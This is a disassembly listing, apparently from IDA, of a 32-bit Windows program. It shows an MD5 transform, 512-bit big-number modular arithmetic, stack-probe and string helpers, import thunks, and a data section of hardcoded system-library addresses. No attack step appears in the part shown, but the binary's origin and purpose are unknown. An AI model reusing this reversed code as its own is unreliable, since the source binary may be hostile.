loc_44406A: ; CODE XREF: sub_443E95+1C5�j
xor ebx, ebx
mov eax, [ebp+var_10028]
cmp [ebp+var_10008], eax
jz short loc_44407D
xor ebx, ebx
inc ebx
loc_44407D: ; CODE XREF: sub_443E95+1E3�j
mov eax, [ebp+var_10008]
push eax
mov eax, [eax]
call dword ptr [eax+8]
mov eax, [ebp+var_10028]
push eax
mov eax, [eax]
call dword ptr [eax+8]
or ebx, ebx
jnz short loc_4440D6
lea eax, [ebp+var_1002C]
push eax
mov eax, [ebp+var_4]
push eax
mov edx, [eax]
call dword ptr [edx+20h]
mov edi, eax
mov eax, dword_44B0A8
sub eax, 3
cmp edi, eax
jnz short loc_4440D6
push [ebp+var_1002C]
push [ebp+var_4]
call nullsub_2
push [ebp+var_1002C]
push [ebp+var_4]
call sub_443589
add esp, 10h
loc_4440D6: ; CODE XREF: sub_443E95+198�j
; sub_443E95+1D3�j ...
mov eax, [ebp+var_4]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_4440DF: ; CODE XREF: sub_443E95+16D�j
mov eax, [ebp+var_10010]
push eax
mov eax, [eax]
call dword ptr [eax+8]
loc_4440EB: ; CODE XREF: sub_443E95+C4�j
; sub_443E95:loc_443FAD�j ...
push esi
mov eax, [esi]
call dword ptr [eax+8]
loc_4440F1: ; CODE XREF: sub_443E95+27�j
; sub_443E95+6E�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_443E95 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4440F8 proc near ; CODE XREF: sub_43AF9B+13�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
cld
mov edi, [ebp+arg_4]
mov eax, 1
stosd
mov ecx, 0Fh
dec eax
rep stosd
lea edi, dword_44C9CC
mov esi, [ebp+arg_0]
mov ecx, 10h
rep movsd
mov edi, [ebp+arg_8]
call sub_4441C3
xor edx, edx
loc_444128: ; CODE XREF: sub_4440F8+52�j
push edx
push ebx
mov eax, [ebp+arg_8]
bt [eax], edx
jnb short loc_44413A
mov edx, [ebp+arg_4]
call sub_444154
loc_44413A: ; CODE XREF: sub_4440F8+38�j
lea edx, dword_44C9CC
call sub_444154
pop ebx
pop edx
inc edx
cmp edx, ebx
jbe short loc_444128
popa
pop ebp
retn 10h
sub_4440F8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444154 proc near ; CODE XREF: sub_4440F8+3D�p
; sub_4440F8+48�p
lea edi, dword_44C98C
mov ecx, 10h
xor eax, eax
rep stosd
lea edi, dword_44C9CC
call sub_4441C3
loc_44416E: ; CODE XREF: sub_444154+5D�j
lea edi, dword_44C98C
mov ecx, 10h
xor eax, eax
loc_44417B: ; CODE XREF: sub_444154+2C�j
rcl dword ptr [edi], 1
lea edi, [edi+4]
loop loc_44417B
call sub_4441D4
bt dword_44C9CC, ebx
jnb short loc_4441B0
mov esi, edx
lea edi, dword_44C98C
xor eax, eax
mov ecx, 10h
loc_44419F: ; CODE XREF: sub_444154+55�j
mov eax, [esi]
adc [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_44419F
call sub_4441D4
loc_4441B0: ; CODE XREF: sub_444154+3A�j
dec ebx
jns short loc_44416E
mov edi, edx
lea esi, dword_44C98C
mov ecx, 10h
rep movsd
retn
sub_444154 endp
; =============== S U B R O U T I N E =======================================
sub_4441C3 proc near ; CODE XREF: sub_4440F8+29�p
; sub_444154+15�p
mov ebx, 1FFh
loc_4441C8: ; CODE XREF: sub_4441C3+B�j
bt [edi], ebx
jb short locret_4441D0
dec ebx
jnz short loc_4441C8
locret_4441D0: ; CODE XREF: sub_4441C3+8�j
retn
sub_4441C3 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4441D4 proc near ; CODE XREF: sub_444154+2E�p
; sub_444154+57�p
lea esi, dword_44C98C
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_4441E2: ; CODE XREF: sub_4441D4+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_44420B
ja short loc_4441EF
dec ecx
jns short loc_4441E2
loc_4441EF: ; CODE XREF: sub_4441D4+16�j
mov esi, [ebp+14h]
lea edi, dword_44C98C
xor eax, eax
mov ecx, 10h
loc_4441FF: ; CODE XREF: sub_4441D4+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_4441FF
locret_44420B: ; CODE XREF: sub_4441D4+14�j
retn
sub_4441D4 endp
; =============== S U B R O U T I N E =======================================
sub_44420C proc near ; CODE XREF: sub_44425D+32�p
; sub_44425D+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_44420C endp
; =============== S U B R O U T I N E =======================================
sub_444219 proc near ; CODE XREF: sub_44425D+219�p
; sub_44425D+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_444219 endp
; =============== S U B R O U T I N E =======================================
sub_444226 proc near ; CODE XREF: sub_44425D+420�p
; sub_44425D+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_444226 endp
; =============== S U B R O U T I N E =======================================
sub_44422D proc near ; CODE XREF: sub_44425D+627�p
; sub_44425D+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_44422D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_444236 proc near ; CODE XREF: sub_43C281+6D�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_444236 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_44425D proc near ; CODE XREF: sub_43C281+8C�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_44CA0C, eax
mov eax, [edi+4]
mov dword_44CA10, eax
mov eax, [edi+8]
mov dword_44CA14, eax
mov eax, [edi+0Ch]
mov dword_44CA18, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44420C
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44420C
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44420C
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44420C
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44420C
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44420C
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44420C
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44420C
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44420C
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44420C
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44420C
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44420C
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44420C
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44420C
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44420C
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444219
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444219
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444219
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444219
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444219
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444219
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444219
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444219
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444219
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444219
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444219
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444219
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444219
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444219
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444219
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444219
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444226
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444226
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444226
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444226
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444226
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444226
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444226
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444226
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444226
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444226
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444226
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444226
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_444226
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_444226
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_444226
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_444226
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44422D
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44422D
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44422D
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44422D
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44422D
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44422D
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44422D
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44422D
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44422D
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44422D
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44422D
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44422D
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_44422D
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_44422D
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_44422D
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_44422D
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_44CA0C
add [edi], eax
mov eax, dword_44CA10
add [edi+4], eax
mov eax, dword_44CA14
add [edi+8], eax
mov eax, dword_44CA18
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_44425D endp
; =============== S U B R O U T I N E =======================================
sub_444AA8 proc near ; CODE XREF: sub_444AC5+1E�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_444AA9: ; CODE XREF: sub_444AA8+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_444AA9
sub esp, eax
test [esp+0FFCh+var_FFC], eax
push ecx
retn
sub_444AA8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_444AC5 proc near ; CODE XREF: sub_43D8A3+38�p
arg_0 = dword ptr 4
pop ecx
pop eax
add eax, 3
shr eax, 2
shl eax, 2
cmp eax, 1000h
jl short loc_444AF5
mov edx, esp
push eax
fild [esp-4+arg_0]
mov [esp-4+arg_0], ecx
fild [esp-4+arg_0]
call sub_444AA8
mov esp, edx
push edx
fistp dword ptr [esp+0]
mov ecx, [esp+0]
fistp dword ptr [esp+0]
pop eax
loc_444AF5: ; CODE XREF: sub_444AC5+10�j
sub esp, eax
mov eax, esp
mov dword ptr [eax], 0
push ecx
push ecx
retn
sub_444AC5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_444B04 proc near ; CODE XREF: .text:0043A1BA�p
; DATA XREF: .data:off_44B000�o
xor eax, eax
inc eax
retn 0Ch
sub_444B04 endp
; ---------------------------------------------------------------------------
align 4
push eax
fnstcw word ptr [esp]
mov eax, [esp]
btr dword ptr [esp], 8
or word ptr [esp], 200h
; START OF FUNCTION CHUNK FOR sub_444B2F
loc_444B1E: ; CODE XREF: sub_444B2F+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
loc_444B22: ; CODE XREF: .text:00444B2D�j
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_444B2F
; ---------------------------------------------------------------------------
push eax
fnstcw word ptr [esp]
pop eax
jmp short loc_444B22
; =============== S U B R O U T I N E =======================================
sub_444B2F proc near ; CODE XREF: .text:loc_43A1A7�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00444B1E SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_444B1E
sub_444B2F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444B40 proc near ; CODE XREF: sub_43B260+8�p
; sub_43B780+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_444B41: ; CODE XREF: sub_444B40+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_444B41
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_444B40 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_444B60 proc near ; CODE XREF: sub_43AA99+31�p
; sub_43AA99+44�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_444B60 endp
; ---------------------------------------------------------------------------
align 4
jmp ds:dword_44D0AC
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444B98 proc near ; CODE XREF: sub_43A25C+10�p
jmp ds:dword_44D0B0
sub_444B98 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444BA4 proc near ; CODE XREF: sub_43A080+13�p
jmp ds:dword_44D0B4
sub_444BA4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444BB0 proc near ; CODE XREF: sub_43A1C3+33�p
; sub_43A1C3+45�p ...
jmp ds:dword_44D0C0
sub_444BB0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444BBC proc near ; CODE XREF: sub_43A1C3+B�p
; sub_43A1C3+17�p ...
jmp ds:dword_44D0C4
sub_444BBC endp
; ---------------------------------------------------------------------------
align 8
jmp ds:dword_44D0C8
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; ---------------------------------------------------------------------------
jmp ds:dword_44D0CC
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444BE0 proc near ; CODE XREF: sub_43A25C+4E�p
; sub_43A25C+87�p
jmp ds:dword_44D0D0
sub_444BE0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444BEC proc near ; CODE XREF: .text:0043A186�p
jmp ds:dword_44D0D4
sub_444BEC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444BF8 proc near ; CODE XREF: sub_43A1C3+71�p
; sub_43A1C3+86�p
jmp ds:dword_44D0D8
sub_444BF8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_444C04 proc near ; CODE XREF: sub_43A25C+9E�p
jmp ds:dword_44D0DC
sub_444C04 endp
; ---------------------------------------------------------------------------
align 10h
_text ends
; Section 5. (virtual address 00045000)
; Virtual size : 00005BD8 ( 23512.)
; Section size in file : 00005BD8 ( 23512.)
; Offset to raw data for section: 00045000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_bss segment para public 'BSS' use32
assume cs:_bss
;org 445000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_445000 dd 77E77EF1h ; DATA XREF: sub_43A9C0+D�r
; sub_440457+130�w
dword_445004 dd 77D46254h ; DATA XREF: sub_43D7F1+14�r
; sub_43D7F1+75�r ...
dword_445008 dd 77E73628h ; DATA XREF: sub_43C38A+1391�r
; sub_440457+A4�w ...
dword_44500C dd 77E79924h ; DATA XREF: sub_43A9C0+34�r
; sub_440457+168�w
dword_445010 dd 77E778C5h ; DATA XREF: sub_43D874+20�r
; sub_43DDA6+18�r ...
dword_445014 dd 77D4702Fh ; DATA XREF: sub_43EA51+226�w
; sub_43EEA0+5A�r ...
dword_445018 dd 0 ; DATA XREF: sub_43B52C+D0�w
; sub_443589+171�r
dword_44501C dd 76C693F0h ; DATA XREF: sub_442822+53�w
; sub_442A46+198�r
dword_445020 dd 73D9E65Ch ; DATA XREF: sub_43A34D+170�r
; sub_43A34D+212�r ...
dword_445024 dd 0 ; DATA XREF: sub_43DAAC+1DF�r
; sub_43ED61+F9�w
dword_445028 dd 77E78B82h ; DATA XREF: sub_43ACC9+7D�r
; sub_43ADAC+F0�r ...
dword_44502C dd 77F82D5Ch ; DATA XREF: sub_43C281+53�r
; sub_440457+280�w
dword_445030 dd 73D9ADFAh ; DATA XREF: sub_43DEF2+23D�r
; sub_43DEF2+261�r ...
dword_445034 dd 77E6AD34h ; DATA XREF: sub_440457+1BC�w
dword_445038 dd 77121651h ; DATA XREF: sub_43AED7+9E�w
; sub_43F0EA+17�r ...
dword_44503C dd 77DD23D7h ; DATA XREF: sub_44015B+66�w
; sub_440FBB+3E�r
dword_445040 dd 77D47EC7h ; DATA XREF: sub_43EA51+1EE�w
dword_445044 dd 77121680h ; DATA XREF: sub_43AED7+4A�w
; sub_43B780+22�r ...
dword_445048 dd 77D5264Ah ; DATA XREF: sub_43EA51+309�w
; sub_440914+26�r
dword_44504C dd 0 ; DATA XREF: sub_43A34D+542�r
; sub_43B52C+7C�w
dword_445050 dd 77D441F2h ; DATA XREF: sub_43EA51+BA�w
; sub_442C0A+259�r
dword_445054 dd 73D9BBAAh ; DATA XREF: sub_43B52C+21C�r
; sub_43B780+2EA�r ...
align 10h
dword_445060 dd 0 ; DATA XREF: sub_43B780+3CB�r
; sub_43B780+4DF�w ...
dd 3E7h dup(0)
dword_446000 dd 77E78C17h ; DATA XREF: sub_43E8A2+ED�r
; sub_440457+344�w
dword_446004 dd 77E75E67h ; DATA XREF: sub_43DAAC+298�r
; sub_440457+2D4�w ...
dword_446008 dd 77E79908h ; DATA XREF: sub_43EFD7+18�r
; sub_440C06+376�w ...
dword_44600C dd 77E62D7Ah ; DATA XREF: sub_440457+34�w
dword_446010 dd 77D5C2CCh ; DATA XREF: sub_43D7F1+31�r
; sub_43EA51+D6�w
